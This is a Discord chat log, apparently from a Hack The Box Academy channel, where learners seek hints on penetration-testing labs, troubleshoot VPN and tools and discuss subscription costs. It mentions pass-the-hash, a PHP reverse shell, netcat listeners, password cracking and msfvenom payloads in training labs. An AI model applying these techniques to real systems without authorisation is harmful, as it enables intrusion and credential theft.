but now it did, thank you and yes i remember haha

autumn pilot
#

Are you connected to the VPN?

#

Does the VM require a VPN connection?

iron basin
#

All good, it gets me every now and then ;D @proud moon

shadow nest
#

Anyone have some free time tonight to help me. I used my own kali vm and htb platform

#

Same issue

iron basin
#

@shadow nest Yeah you using pwnbox or own vm

iron basin
#

If ya want dm me so I can see your shell code and commands @shadow nest

slender linden
#

Hiii

magic valve
#

I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a long time.

Have found admins hash with system level privileges on SQL01 box and have chisel/pivoting tool running on victims box and it running on ssh attacker machine but receiving a connection error message when trying to pass the hash utilizing proxychains and evil-winrm

shadow nest
#

@iron basin @autumn pilot I am using the open vpn connection

#

For both my vm and htb platform

#

Yes I will send it over @iron basin

#

My fault picking up the kids from school lol

iron basin
#

@shadow nest Can ya try the pwnbox as I have found openvpn sometimes to be finnicky

#

all good

little wyvern
iron basin
#

Very annoying, anyone have connectivity issues with certain labs?

autumn pilot
#

nope

iron basin
#

3;

#

Seems to me all my boxes no matter the section of this module continue to disconnect or timeout after around 5mins.

iron basin
#

@high sentinel Using pwnbox

high sentinel
#

just try running ping box in the background and check the output when the issue occurs

#

if the ping works just fine the whole time, i'd say that's some application level issue then

iron basin
#

I dont know its weird behavior. I just reset the target machine and pwnbox and the target is unreachable. Earlier it worked then now its half n half, with half the time working and when it does it cuts out eventually.

high sentinel
#

hmm

#

maybe try running wireshark in the background as well? I think pwnbox should have no issue with vpn connectivity as long as there are no issues with htb infrastructure but i personally don't use it so i'm not like 100 % sure. Why don't you use your own vm?

iron basin
#

I do when Im home but away I use pwnbox. Also find a vm over the browser just really cool for some reason haha

#

Yeah, reset the machine, ran ping, worked up until the 82nd icmp_seq and them disconnected again. Maybe its a feature of the lab I am working on? The lab is Attacking Common Services - Easy

high sentinel
#

I don't think that's a feature

magic valve
iron basin
graceful rampart
# magic valve Yeah

~~ Who says you need PtH? Bloodhound reveals all ~~ nvm im dumb, was looking at the wrong notes

high sentinel
graceful rampart
#

DM me, dont wanna spoil anything here

iron basin
high sentinel
high sentinel
#

I'm not sure how the support stuff works though, i've never used it so don't be too eager about that

hallow remnant
#

Hey, general question for the group: I've noticed that a lot of my meterpreter connections in the labs frequently timeout after not so much time passes. In practice, I know that there are a multitude of things that could contribute to this (such as AV, system instability, etc.). However, I figured the labs that were purpose-built for introducing folks to Metasploit wouldn't include this added instability.

I'm wondering if anyone else has encountered a similar issue and what they've done to try and generate more stable shells.

high sentinel
hallow remnant
high sentinel
#

hmm .. are other forms of shells working just fine?

hallow remnant
#

Generally, yes (e.g. python, netcat, perl, etc.)

fathom pendant
hallow remnant
#

Not a huge deal, just a bit of a quality-of-life problem for stepping through the various Academy modules

high sentinel
#

sounds like a network related issue

#

is your vpn stable?

hallow remnant
high sentinel
#

dm?

hallow remnant
mild halo
#

Want to send text from terminal to other linux terminal.Suggest me the way?

mild halo
#

lol

high sentinel
#

usually ctrl + shift + c, ctrl + shift + v

mild halo
#

@high sentinel real chat i mean to say

high sentinel
#

then nc -nvlp listener_port , nc listener listener_ip listener_port

mild halo
#

can you please describe this command
i am new to this world @high sentinel

high sentinel
#

what is it that you don't understand?

mild halo
#

-nvlp

high sentinel
#

what exactly are you trying to do anyway?

rustic sage
mild halo
#

just want to send text to other ubuntu system without knowing the network ip

high sentinel
#
-n      Do not perform domain name resolution.  If a name cannot be resolved without DNS, an error will be reported.
-v      Produce more verbose output.
-l      Listen for an incoming connection rather than initiating a connection to a remote host.  The destination and port to listen on can
             be specified either as non-optional arguments, or with options -s and -p respectively.  Cannot be used together with -x or -z.
             Additionally, any timeouts specified with the -w option are ignored.
-p source_port
             Specify the source port nc should use, subject to privilege restrictions and availability.
fathom pendant
#

if only there was a man to tell you

rustic sage
high sentinel
#

that's not possible

fathom pendant
#

^

mild halo
#

i kwno its its bit tricky

#

then suggest me how can i check the details of system by using same network

#

others*

fathom pendant
#

not sure what you mean then

high sentinel
#

it this related to htb academy? if so, ask more specificaly? if not, i'd suggest you ask about that elsewhere

mild halo
#

ok thanks man @high sentinel

#

i got the man @fathom pendant

high sentinel
fathom pendant
mild halo
#

like if i connected to network and want to know the other system ip that are connected to the same network

fathom pendant
high sentinel
crude geyser
#

i basically found a vulnerability in this webapp, where I can go ahead and add a public page to registered users, what should I do next to gain file access?

fathom pendant
#

Is this related to htb academy content?

#

if not then ask in #1024429874246590575 ; are you allowed to have access to these things - if not; have you reported the vulnerability to the webapp devs?

shadow nest
#

when I run the curl command

#

I get this but no netcat call out

fathom pendant
#

if you're trying to post a screenshot, you'll need to first verify your htb account in #bot-commands

shadow nest
#

I am struggling

#

thank you @fathom pendant

#

🙂

fathom pendant
#

Looks like a shell PHP, which curl gave you the code for

shadow nest
#

right but the shell should catch on the listener correct?

fathom pendant
#

What is the PHP code you're trying to run? Cause all I'm seeing is just setting vars

#

But it's not actually doing the callout

thorn urchin
#

and if youre seeing the vars like that then your php code is likely broken

fathom pendant
#

^

#

Because generally that means if you navigate to that page you'll see that displayed on the page

shadow nest
#

yes that is correct

#

I am seeing the IP and port displayed on the page

#

but I am following the HTB walkthrough

#

Disregard

#

SLOW MOMENT

#

haha

#

smh

#

you are right

#

@fathom pendant @thorn urchin

#

Thank you

fathom pendant
#

Np

#

Easy mistakes :D

timber hatch
#

isn't that a contradictory note?

fathom pendant
#

not really

#

the note is just there for an fyi

#

that latter part is a reminder for this specific exercise

thorn urchin
#

its saying this method is flexible for even different systems but warning it wont work on the exercise due to extra restrictions that situationally you wont see in the real world.

umbral river
#

anyone else having problems spinning up boxes for the modules?

supple jackal
#

hey im on linux fundamentals and im using my own vm running kali and im on a zsh terminal.. and i connected to the vpn connection file it gave me and a spawned a target ip.. i can scan with nmap and see mad ports open.. but when i try to ssh in i get nothing and eventually it ends the connection

#

yes

#

i cant connect

#

but i can scan

fathom pendant
#

what is the question asking you to do?

supple jackal
#

ok the first question is asking me to id the machine hardware name

#

the second is to id the path to htb-student home dir

#

i got the first one answered by using uname -a

#

and i found the machine har name

fathom pendant
#

mhm

supple jackal
#

but when i cd into home its my home not the targets

fathom pendant
#

so

#

what if there was a way to Print the Working Directory

#

which gives you the FULL path

#

let me go over the linux funds course real quick to check what it wants more specifically

#

one moment

supple jackal
#

pwd

#

lol

#

thank you

fathom pendant
#

np

#

speaking of. let me just quickly knock out linux funds

supple jackal
#

lol ok maybe im dumb dumb but what happened, i got the answer wrong

#

is it not /home

#

/ being the path

fathom pendant
#

no

#

well

supple jackal
#

wait dont tell me

fathom pendant
#

/ is the ROOT directory

supple jackal
#

ok ok

#

ill figuer it out

fathom pendant
#

/home is all the homes

supple jackal
#

thank you

fathom pendant
#

you should be able to figure it out from there :)

still yacht
#

Is there a problem with starting machines now at academy ?

fathom pendant
#

think of /home as you being in the neighbourhood of all the users and can see who lives where

#

i was able to start a machine just now, some machines do take slightly longer to spawn depending on services it needs to start up

still yacht
#

hmm cant seem to start machines at file inclusions skill assesment 😦

supple jackal
#

ok so i figured it out it would be /home/htb-student.. but now i know 100% im not on the targets server

#

so lol why is that

#

lol why this keep happening

#

lol i can see that ssh is open so why can't i connect

fathom pendant
#

also

#

"htp-student" it's "htb-student"

supple jackal
#

omg

#

wtf

fathom pendant
#

which is also probably why

supple jackal
#

lol yup probably why for sure

#

o that hurts

fathom pendant
#

if you wish to continue with help my DMs are open, as I said I'm just gonna bust through these

supple jackal
#

dope thanks

fathom pendant
#

ping me here if you dm because I have it set to not notify me if I get a dm request

#

also biggest of the tips: linux is case sensitive with it's options

#

-l and -L are 2 different things

supple jackal
#

@fathom pendant i msged you

rustic sage
#

Hi, I'm on the windows module and the last section. I just did the first two steps. Now I'm doing step 3 but it's bugging me a bit. It tells me "Creating a user called jim; Uncheck: User must change password at logon" I'm doing it through "Family & others users" and i don't get any boxes where i can uncheck "User must change password at logon" so I'm kind of not sure if I'm doing the right thing or wrong thing. Cause I don't remember the module talking about creating accounts https://i.imgur.com/IERGruE.png. Anyone has any idea?

safe adder
#

Does anyone know which option's better? It costs 400£ for 5000 cubes. Platinum subscription gives 1000 cubes (or does it?) a month for 53£. Obviously the later seems like a juicy deal, so am I missing something?

#

@ocean night staff, some help pls?

rustic sage
#

@fathom pendant

#

@safe adder When you buy a sub you get the boxes u bought the sub with + more every month

fathom pendant
fathom pendant
safe adder
thorn urchin
#

jumping to pinging staff before seeing if someone else it better able to redirect you or answer your question is pretty low survival instinct

fathom pendant
rustic sage
fathom pendant
rustic sage
#

And this is the academy I'm talking about

dim wolf
#

why is the provided cheat sheet for the file transfers module so bare? there are loads of information and commands to gain from the module

safe adder
#

Staffs current online can you confirm? @ocean night

fathom pendant
#

<@&861185840277487616>

dim wolf
#

ouch

rustic sage
fathom pendant
#

Don't ping random staff

fathom pendant
fathom pendant
#

But what do you think should be included, I'd submit in #858470491676737536 if you think it's something worth adding to the cheat sheet @dim wolf

magic valve
#

Active Directory skill assessment #2: + 1 Crack this user's password hash and submit the cleartext password as your answer.

May I get a hint please? I attempted kerberoast as Admin on MS01 host.

rustic sage
# safe adder Currently, it's student plan.

Ah, i think the student plan only have access to a few tiers. But once u buy a higher sub u have access to all the others. Not 100% about this. But as i said, there is information about this on the site i found this helpful when i bought my sub

safe adder
#

The silver annual didn't specify monthly cubes, rather access to all tiers up to II, whereas monthly Silver gives you 200+ cubes a month.

fathom pendant
#

Silver annual = silver monthly, just pay annually instead of monthly

woeful ermine
#

well they are totally different though

safe adder
#

Some people are just annoying. They know nothing, just want to mouth off.

dim wolf
#

i added a bunch of stuff to the cheat sheet for my reference but i don't have enough self-confidence to submit a suggestion like that

fathom pendant
#

Just do it, if anything you'll get feedback as to why it wasn't included

#

¯_(ツ)_/¯

thorn urchin
dim wolf
#

i will.. consider it.

rustic sage
#

Big question, why is anime a thing as a PP?

dim wolf
#

what??

safe adder
#

Cultured thing!

thorn urchin
rustic sage
thorn urchin
#

dont spam modules chat with off topic stuff

#

verify your account in #welcome and shitpost in general chat

dim wolf
#

staff released some modules that look really interesting but too bad i only have student sub rn

rustic sage
fathom pendant
#

The major difference between the two is; annual gives you the access to the modules and job role paths, the monthly does not

thorn urchin
fathom pendant
#

And annual includes a voucher for one of the job role paths

rustic sage
dim wolf
#

the voucher expires after a year though so you can't just stack vouchers

woeful ermine
safe adder
#

@rustic sage you have the Silver monthly?

fathom pendant
rustic sage
woeful ermine
safe adder
#

Then I think, Plat is also going to be the same. If Silver gives 200 cubes, it's probably going to be the same.

fathom pendant
fathom pendant
dim wolf
#

true

fathom pendant
#

Maybe 6

woeful ermine
#

agree :))

fathom pendant
#

I don't feel like doing all that math

woeful ermine
#

hahaha

#

me neither

#

I have student sub anyway

#

hahaha

fathom pendant
#

But the point is flexibility

#

¯_(ツ)_/¯

#

It's more flexible to be able to go through the path without having to wait for more cubes or buy anyway

woeful ermine
#

yes, especially if you are in hurry or sth

fathom pendant
#

Yea

#

And considering the value of one of the cert vouchers (which are good for 2 attempts) ($210 + tax) that's already half the value

rustic sage
#

Hey guys? What module are you guys talking about?

#

Lol

fathom pendant
#

Funny guy

woeful ermine
#

all of them

#

hahaha

fathom pendant
#

As the topic is still regarding the modules and academy, it's still on-topic

#

¯_(ツ)_/¯

thorn urchin
#

discussing optimal ways to purchase modules is an on topic subject for modules channel

fathom pendant
#

And the answer is it depends

rustic sage
#

Don't spam

fathom pendant
median fog
#

When I looked at subscriptions, it seemed cheaper to buy the cubes.

Silver annual costs £350; the exam would cost £150, so you're effectively paying £200 for the cubes. At that point, all the tier 0/1/2 modules added up to 1960 cubes (net), although I think HTB have added a few more since. So, that's roughly £200 for 2000 cubes.

By contrast, I could buy 2000 cubes for £160 if I bought them without a subscription.

fathom pendant
#

Yes, and that's if your intent is solely to go down one path

#

With little to no deviation

thorn urchin
#

works for me

median fog
#

The other thing I noticed about the cubes is that there's no bulk discount. So, the only reason to buy 1000 at a time rather than 10 purchases of 100 cubes is convenience.

thorn urchin
#

I bought em in chunks as I cleared out modules. was easier than dropping the full load at once

woeful ermine
safe adder
median fog
fathom pendant
#

As well

thorn urchin
#

it also depends how long you expect yourself to take

safe adder
fathom pendant
#

If you're on the student one, no reason to go past

#

But it just depends

#

If you want to do that it's on you

safe adder
thorn urchin
#

if it doesnt mention qubes you dont get qubes

fathom pendant
#

^

#

No reason to have cubes if you can access it

median fog
fathom pendant
#

And yes if you complete a module you get permanent access to it

#

So if you cancel after a year you can go back

safe adder
fathom pendant
#

up to your personal preference tbh

#

if you're not interested in the app side of things (bug bounty path) then it may not be worth it. But doesn't hurt to be able to just choose whatever modules you want after completing your desired path

dim wolf
#

unless you're a college student, in which case the student sub gets you the most value until you've completed all available modules

median fog
#

The other benefit of subscriptions is CPE credits (presumably for ISC2?) but I can get those other ways.

dim wolf
#

still not sure what CPE credits are for

safe adder
#

Sudent sub in my opinion is really worth it. 6£ monthly for tiers up to 2. Btw, what is the CPE credits?

median fog
#

I know that the "main" HTB can be used for CPE at ISC2 (so many points for each active box you get), and I assume that there's a similar thing for HTB academy, but I haven't seen any official details.

dim wolf
#

CPE credit submission is available to our subscribed members. Subscribed members can obtain credits by completing Hack The Box Academy modules, Tier I and above. In order to start tracking your activity and automatically get your credits, you just need to enable this option through your account settings.

Here is how CPE credits are allocated:

Fundamental modules: 2 CPE credits
Easy modules: 4 CPE credits
Medium modules: 6 CPE credits
Hard modules: 8 CPE credits
Insane modules: 10 CPE credits
#

although there haven't been any insane modules released yet

fathom pendant
median fog
#

I've bought 1000 cubes (solo purchase) so far, and I've used about half of them. Based on this discussion, I think I'll go for Platinum for a month, since it's cheaper than buying the other 1000 directly.

dim wolf
#

don't tell anyone but i didn't actually use the help section

#

now i know it's there though

safe adder
median fog
safe adder
#

How do you get the ISC2 member ID? What's that.

median fog
#

I'm putting this training through my limited company (VAT registered) so it won't cost me anything in the long term.

fathom pendant
rustic sage
#

Im having a hard time with the attacking sql service in the attacking services module, the credentials provided have no privilege and I cant seem to do anything

fathom pendant
#

as most certifications do expire after a certain amount of time

safe adder
#

What does the credits do?

fathom pendant
#

Continuing education Credits are used in lieu of redoing the exam to have it extend

median fog
#

In my case, I've got the SSCP, so I need 20 CPE (on average) per year to keep it active. It hasn't been particularly useful, but if I can pick up the CPE from stuff I'd do anyway then I might as well keep it going.

fathom pendant
#

when it comes time to renew your cert: if you have enough CPE; in a relevant field, they just say "alright you've proven you're staying on top of this" and tend to renew

#

tfw i thought I had sec+ from compTIA but I don't kekw

woeful ermine
rustic sage
#

Its not allowing me to autheticate I read the section not sure whats going wrong

#

mysql wont work with the credentials they provided

woeful ermine
#

are you using parrot

#

people were discussing sqsh is broken in parrot

#

I use kali so dont have any idea

fathom pendant
#

sqsh is indeed borked on parrot

rustic sage
#

I am using kali linux, I can access sqsh but not sure what to do here, I used help to see the commands

#

Okay so I should look up sqsh syntax?

fathom pendant
#

probably

versed lichen
#

Hey, I'm doing Footprinting/IPMI module rn. I got admin pass hash. I put it into txt file and use provided hashcat command. Everything is working great (I hope so), but I'm wondering if everything is great with progress of unhashing (?). Could somebody look at my screenshot and tell me if I have to wait 5 days for results?

I'm using VMWare kali linux (hashcat isn't working on my Windows idk why)

dim wolf
#

in my case i cracked it in about a second

rustic sage
dim wolf
#

although it also depends on what wordlist/patterns you're using

fathom pendant
#

^

bright ridge
#

is there a place to buy badges like you get on defcon to hack?

#

seems cool

fathom pendant
#

nope

#

unless you mean physical merch then maybe the swag shop

#

¯_(ツ)_/¯

bright ridge
#

i mean in general, outside this platform

#

something like this

#

anyway i see im in the wrong channel too sorry

rustic sage
#

can I message someone who knows about sqsh syntax

fathom pendant
versed lichen
unborn summit
#

I just finished the Metasploit module on academy and at the end it reads “To get more practice with this tool, check out the HTB boxes tagged at the end of this module” but i can’t find what it’s talking about can anyone show me please?

thanks

acoustic owl
glacial matrix
rustic sage
#

anyone complete

Skill Assessment - Broken Authentication?

fathom pendant
#

hm... interesting

velvet pawn
#

Have a question regarding "Password Attacks":"Protected Files" section, the question point to use the cracked password for the user Kira.... what cracked password? that phrasing is confusing, is that cracked password already provided, or am I to enumerate the box, and find a file/hash to crack and obtain the password that way?

rustic sage
dim cosmos
#

hi all

rustic sage
#

is there a support channel on discord?

fathom pendant
#

best way to contact support is through the website chat bubble

rustic sage
#

great then i can wait 3 days for them to reply and then have them close my ticket early lol

#

thanks

#

and now the chat button isn't loading

fathom pendant
#

if it's not showing up; search an article and say "no that didn't help" or do you mean the green chat bubble; adblock stops it from popping up if you have that enabled

rustic sage
#

ya thats the one i dont have any block software but i'll try what u just said

#

hmm thats not working either all it gives is 3 emojis to give feedback

#

anyone here done enterprise networks?

fathom pendant
#

ye

#

sadface emoji

#

then it should give you the option

rustic sage
#

ya i did that it doesnt do anything

velvet pawn
#

any ideas why this john would end the session right after starting without actually cracking the hash?

john --format=PKZIP --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:22) 0g/s 7279Kp/s 7279Kc/s 7279KC/s !jonaluz28!..*7¡Vamos!
Session completed

rustic sage
#

try --show

#

at end maybe it was already cracked

fathom pendant
#

actually i know why

velvet pawn
#

john zip.hash --show
0 password hashes cracked, 1 left

fathom pendant
#

looks like it's a format that john doesn't know how to decode

velvet pawn
#

interesting, I mean I generated the hash with zip2john and it does load it as PKZIP

fathom pendant
#

i had a similar thing happen with a different module

#

where it gave the *Vamos!

#

is it also possible the pass was salted as well?

velvet pawn
#

I mean... it would be going way out of what the module is showing me to do

fathom pendant
#

also

#

it could be the case that rockyou isn't the wordlist

#

did the module provide you a different wordlist?

rustic sage
#

check resources in upper right of module above table of contents

velvet pawn
#

its finishing in 1ms, I dont think its even starting, rockyou is a big list, even if the password was not there, it should run for a while

rustic sage
#

true

velvet pawn
#

ill use a different wordlist to see

rustic sage
#

try doing john without --format it can often determine which one

fathom pendant
#

it can also falsely identify but that is also a possibility

velvet pawn
#

same thing


└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:36) 0g/s 7469Kp/s 7469Kc/s 7469KC/s !jonaluz28!..*7¡Vamos!
Session completed
fathom pendant
#

try remaking the hashfile

rustic sage
#

yep make sure there arent any extra lines or spaces or bad chars

velvet pawn
#

ssh2john was broken, but that was a python issue, so I had to modify it to work, I wonder if something else is broken with this

#

yeah let me try remaking the hash

rustic sage
#

go into it with nano and check for the things i just said 🙂

fathom pendant
#

nano < vim

rustic sage
#

perhaps 🙂

fathom pendant
#

vim is better :) if you know how to utilize it properly

#

much better

rustic sage
#

which i dont lol one of these days tho

velvet pawn
#

nothing, different wordlist, new hash, no empty lines of weird characters... john is not liking it

#

will try fcrackzip I guess....

fathom pendant
#

i don't think pkzip is accepted?

#

i think normal zip is

#

from the man page:

-format:NAME
  Allows  you  to  override  the ciphertext format detection. Currently, valid format names are DES, BSDI, MD5, BF, AFS, LM.  You can use  this  option  when cracking or with '-test'. Note that John can't crack password files with different  ciphertext  formats at the same time.
#

try adding -test to see if it gives you a reason

velvet pawn
#

I see, thanks, let me give that a try

rocky saddle
#

anyone did squashed in htb ?

fathom pendant
#

that's a box right?

lyric echo
#

Hey! Can someone help me with with Attacking Common Applications Assessment I? The last question regarding the flag... I was able to use the /cgi to view the directory and get to the flag... However, no command is allowing me to view the contents of the flag.

Any advice? thanks!

tidal kelp
#

Hi gang,
Doing the CPTS path. just did Footprinting\FTP\2nd task. Could someone explain to why I'm able to connect to the ftp server, download the content (flag), but not list the content with 'ls' while being connected? It prompts me for a creds

supple jackal
#

hey can anyone give me a hand im really stuck, i can not vpn in

autumn pilot
#

can you elaborate?

fading ridge
#

Anybody who finished the web services and api module from cbbh? 😁

dense charm
ember jewel
#

please, would somebody be able to assist with the last question on the skill assessment on LFI module, things i have tried so far include; -i have fuzz for parameter using ffuf and saw that one working param is the page param
-i have tried fuzzing with the LFIjhadix.txt file in order to spot a path traversal i can use but no success
-i have look for cve concerning php v7 and nginx without success
-i have gone through the source code but no hint

woeful ermine
woeful ermine
tidal kelp
#

Great learning experience though

dim cosmos
#

boy oh boy i just went down some horrendous rabbit holes in the file inclusion skills assessment NootLikeThis

sly nebula
#

I need some help with "TLS Attacks" - Skills Assessment. I have found almost the whole flag, but for some weird reason some part of it is corrupted. Could someone check my approach?

#

I can provide details on what I did so far.

twin gulch
#

Hey guys. Anyone who wrote some notes bout passwords attacks skill assessments medium lab? Stuck a little

autumn pilot
#

do you have a specific question?

twin gulch
#

Well I got that I need to dig in some user and crack its files password, tried to hydra to locate some details about the user but it seems that it doesn’t support password auth, only keyboard..

#

And ssh , 139 and 445 ports are opened

autumn pilot
#

If you have managed to read the file that can be easily found, then you have a clue where to go

twin gulch
#

Well I’m stuck about the fact that I don’t have any detail about users for this lab

#

Or it’s based on the previous lab?

autumn pilot
#

everything you need is in that file

twin gulch
#

Well you mean the resources?

autumn pilot
#

nope, in smb

sly nebula
#

Solved, it was a minor mistake by me.

graceful rampart
#

It was a fun one

twin gulch
#

And I saw the log through its history at ssh and saw he used lasagne and got 2 hashes. I think they less important than this smb’s

autumn pilot
#

once you have the interesting file and you can read it, try log onto the target and enumerate further

#

there might be something hidden from plain sight

twin gulch
#

Well I’m telling ya bro, I got both zip and docx file passes, entered Jason, enumerated further and got that information about cry0l1t3, continued enumerating that smb

fathom pendant
autumn pilot
#

no, you said "Well I got that I need to dig in some user and crack its files password,", so try now to enumerate the system

twin gulch
#

So I need to continue dig in for more information, instead of trying to get something from that smb’s user, cause I cannot perform any command there

autumn pilot
#

again, once you have the file and can read it, use the contents

#

the service might not be visible to an outsider

#

but can be visible otherwise

woeful ermine
twin gulch
#

Well that documentation file informing me about creating inlane installation

fathom pendant
#

Fair

autumn pilot
#

it gives you enough information to assume what they could have been doing

twin gulch
#

Can you answer me dm?

rare topaz
#

I'm stuck in linux where they ask you to use the find command.

I've tried alot of commands but the file just doesn't seem to appear

midnight dagger
#

hello i want to know what is the root flag

rare topaz
#

it's found whenever u get root access basically

#

hack
gain access to root user/account
find root.txt

midnight dagger
#

i know hacking and pentesting but i am new to hack the box when i opend the starting machines i found questions and i answered them but what should i hack ???

#

sorry i just know got it

#

when i connect to the machine it become like a gust on my computer

autumn pilot
#

you know hacking and pentesting, which means that you should already know the things

midnight dagger
#

ya but i din't know that the machine become a guest after i connect to it

#

it's a simple telnet connection

autumn pilot
#

nothing stops you from researching

midnight dagger
#

i did i found it by googling it

livid bluff
#

HI,
Since yesterday i'm on the skill assessment in the brute force module in service login section.
I have the word list made with username-anarchy which has 15 words. Is that right?
And I have the second list made with cupp, apparently this one is just made with the first name, number, special characters and leet? I have 1320 words.
I read that we need to put the surname too.
It's been several times that I run this brute force and I always end up losing the connection with the server and I can't solve this section ....
Thanks for help and tips 😉

twin gulch
#

Hey guys, I’m at passwords attacks skill assessments medium lab
I went through and now I’m at the part when I got inside the file that the ip I need to connect with is 10.129.200.21 with root and non password, but I’m struggling to get that smbclient connection

woeful ermine
storm jackal
#

Anyone have tips on how to get through Shells & Payloads - The Live Engagement? Can't even send a payload through to the foothold let alone connect to internal hosts because it is so slow.

twin gulch
autumn pilot
twin gulch
#

Well I saw the info about inlane in the document, I’ll enumerate in the ssh for files

tidal crown
#

Question on the Silver Annual plan, will this unlock the CREST module?

sly reef
#

I've been hours cracking Kira credentials and i'm tired can someone help me out? Password attack modules

rustic sage
#

Did anyone do the noSQL injection module and could give me a hint at the last assessment?

arctic sentinel
#

Hello everyone! Since I was tired of not understanding some of the commands I was introducing I decided starting the "introduction to bash scripting" to my surprise... I`m already stuck in the first script... anyone has done this module or knows bash scripting?!

arctic sentinel
storm jackal
arctic sentinel
graceful rampart
storm jackal
graceful rampart
#

You can generate a payload with msfvenom and upload it manually. (You're talking bout the tomcat exploit right?)

rustic sage
storm jackal
graceful rampart
#

Would try to troubleshoot but I'm not home rn. Sorry

storm jackal
#

No problem! Did you already complete that section?

graceful rampart
#

Yes

simple zephyr
#

anyone able to get the Rpivot to launch the page on firefox. I have confirmed everything is set up right and can access the page with curl, but getting timed out attempting to directly access it.

storm jackal
livid bluff
# deft bison did the issue resolve?

Nop 😦
When is not the server down is this :
[ERROR] 1 target was disabled because of too many errors
I think I have the right list of words, we should not block like that for brute force ...

median fog
woeful ermine
twin gulch
#

I did it, I was just off for a few weeks due to army stuff (I’m Lt)

#

I get that there is something about MySql

#

Gonna enumerate a little further

woeful ermine
#

yes and the next step is pretty basic foundational stuff

rustic sage
#

The installation guide of NoSQLMap in the nosql injection module is outdatated. someone please help me.

Traceback (most recent call last):
  File "nosqlmap.py", line 544, in <module>
    main(args)
  File "nosqlmap.py", line 45, in main
    attack(args)
  File "nosqlmap.py", line 163, in attack
    nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args)
  File "/home/htb-ac687720/Desktop/NoSQLMap/nsmweb.py", line 465, in postApps
    injIndex = int(args.injectedParameter)
TypeError: int() argument must be a string or a number, not 'NoneType'

rare topaz
#

but yes, it's outdated

#

I suggest using alternatives

rustic sage
#

whats an alternative

#

im stuck at the last assessment i tried every payload manually with no success

rare topaz
#

wait uh

#

i have the alternative but i need to find the name